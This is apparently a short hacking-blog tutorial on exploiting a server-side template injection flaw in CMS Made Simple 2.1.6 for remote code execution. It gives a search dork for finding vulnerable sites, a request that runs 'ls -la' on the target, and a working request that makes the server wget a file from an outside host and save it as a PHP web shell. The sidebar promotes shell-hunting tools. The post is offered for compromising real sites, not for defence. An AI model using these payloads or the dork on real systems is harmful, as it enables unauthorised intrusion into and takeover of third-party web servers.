Tutorial Execution Server-Side Template Injection Vulnerability in CMS Made Simple RCE Upload Shell.


Dork :  "Powered by CMS Made Simple" 2.1.6

Exploit Check Vuln:

string:{php}echo system(%2527Command%2527);{/php}

To Make It Easier We Use Exploit Below: v For Vuln Checks

/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=string:{php}echo system(%2527ls -la%2527);{/php}&cntnt01returnid=1

That Vuln Site Example: D

Now We RCE To Upload Shell: D

/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=string:{php}echo system(%2527wget http://secpriv8.com/met.txt -O jamet.php%2527);{/php}&cntnt01returnid=1

Now we check the shell that we uploaded

and successfully uploaded: D 


More Info Check On My YouTube :D Disini




Komentar

Postingan populer dari blog ini

Cara Mendapatkan Big List Site Laravel + New Fresh Dork Laravel

Tools Reverse Ip Multithreading Free Download

Cara Run Bot Python Di Termux Untuk Mencari Shell,Smtp dan Lainnya.